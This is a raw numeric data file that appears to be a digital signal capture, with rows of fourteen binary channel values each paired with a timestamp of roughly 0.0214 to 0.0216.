0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375444e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375468e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375496e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375520e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375548e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375572e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375596e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375620e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375644e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375668e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375696e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375720e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375748e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375772e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375796e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375820e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375844e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375868e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375896e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375920e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375948e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375972e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375996e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1376020e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1376044e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1376068e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1376096e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1376120e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1376148e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1376172e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1376196e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1376220e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1376244e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1376268e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1376296e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1376320e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1376348e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1376372e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1376396e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1376420e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1376444e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1376468e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1376496e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1376520e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1376548e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1376572e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1376596e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1376600e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.1501164e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,2.1501400e-02 1,1,0,0,1,1,0,0,0,1,0,1,0,1,2.1501420e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,2.1501444e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,1,2.1501732e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,2.1501756e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.1501764e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.1501780e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.1501804e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.1501832e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.1501856e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.1501880e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.1501908e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.1501932e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.1501956e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.1501980e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1501996e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502004e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502032e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502056e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502084e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502108e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502132e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502156e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502180e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502204e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1502212e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1502256e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1502284e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,2.1502288e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502292e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502308e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502332e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502356e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502380e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502404e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502432e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1502436e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1502484e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1502508e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502516e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502532e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502556e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502580e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502604e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502632e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502656e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502684e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502708e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502756e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502780e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502804e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502832e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1502836e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1502884e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1502908e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502916e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502932e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1502956e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1502980e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503004e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503032e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503056e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503080e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1503108e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1503156e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1503180e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503188e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503204e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503232e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503256e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1503284e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1503332e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1503356e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503364e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503380e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503404e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503432e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503456e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503484e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503508e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503556e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503580e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503604e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503632e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503684e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503708e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503732e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503756e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503780e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503804e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503832e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503856e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1503884e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1503908e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1503956e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1503980e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1503988e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504032e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1504036e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1504084e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1504108e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504116e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504132e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504156e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504180e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504204e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504232e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504256e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504284e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1504308e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1504356e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1504380e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504388e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504404e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504432e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504456e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504484e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504508e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504532e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504556e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504580e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504604e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504632e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504656e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504684e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504708e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504732e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504756e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504780e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504804e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504832e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504856e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504884e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1504908e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1504932e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1504936e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1504980e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1505004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505012e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505032e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505056e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505084e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505108e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505132e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505156e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505208e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505232e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505256e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505284e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505308e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505332e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1505336e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1505356e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1505380e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1505404e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1505432e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505436e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505480e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505508e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505532e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505556e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505580e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505604e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1505612e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1505656e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1505680e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,2.1505688e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505692e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505708e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505732e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505756e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505780e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505804e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505832e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505880e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505908e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505932e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1505956e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1505980e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506004e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506032e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506056e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506076e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506108e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506132e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506156e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506180e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506204e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506232e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506256e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506276e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506308e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506356e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506380e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506404e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506432e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506456e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1506484e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1506508e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1506532e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1506556e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1506580e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506588e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506632e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506656e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506684e-02 1,1,0,0,1,0,0,0,0,1,0,0,0,0,2.1506708e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1506712e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1506756e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1506780e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506788e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506804e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506832e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506876e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506904e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1506928e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1506956e-02 1,1,0,0,1,0,0,0,0,1,0,0,0,0,2.1506980e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1506984e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1507028e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1507052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507060e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507080e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507104e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507128e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507156e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507180e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507204e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507228e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507252e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507276e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507304e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507328e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507356e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507380e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507404e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507428e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507452e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507476e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507504e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507528e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507556e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507580e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507604e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507628e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507652e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507676e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507704e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507728e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507756e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507780e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507804e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507828e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507852e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507876e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507904e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507928e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1507956e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1507980e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508004e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1508028e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508052e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1508076e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508104e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1508128e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508156e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1508180e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508204e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1508228e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508252e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1508276e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508304e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1508328e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508356e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1508380e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508404e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1508428e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508452e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1508476e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508508e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1508532e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508556e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1508580e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1508604e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1508612e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,2.1633068e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.1633252e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,2.1633268e-02 0,0,1,0,1,1,0,0,0,1,0,1,0,1,2.1633300e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,2.1633324e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,1,2.1633652e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,2.1633676e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,2.1633684e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,2.1633724e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,2.1633752e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,2.1633804e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,2.1633828e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,2.1633876e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1633900e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1633952e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1633976e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634028e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634052e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634100e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634124e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634152e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634204e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634228e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634276e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634300e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1634308e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1634352e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1634376e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634384e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634428e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634452e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634500e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634524e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634548e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634572e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1634580e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1634596e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1634624e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,2.1634628e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634632e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634676e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634700e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634748e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634772e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634824e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634852e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634900e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634924e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1634932e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1634948e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1634972e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1634980e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1634996e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635024e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1635028e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1635076e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1635100e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635108e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1635124e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635148e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1635172e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635200e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1635224e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635248e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1635276e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635300e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1635304e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1635348e-02 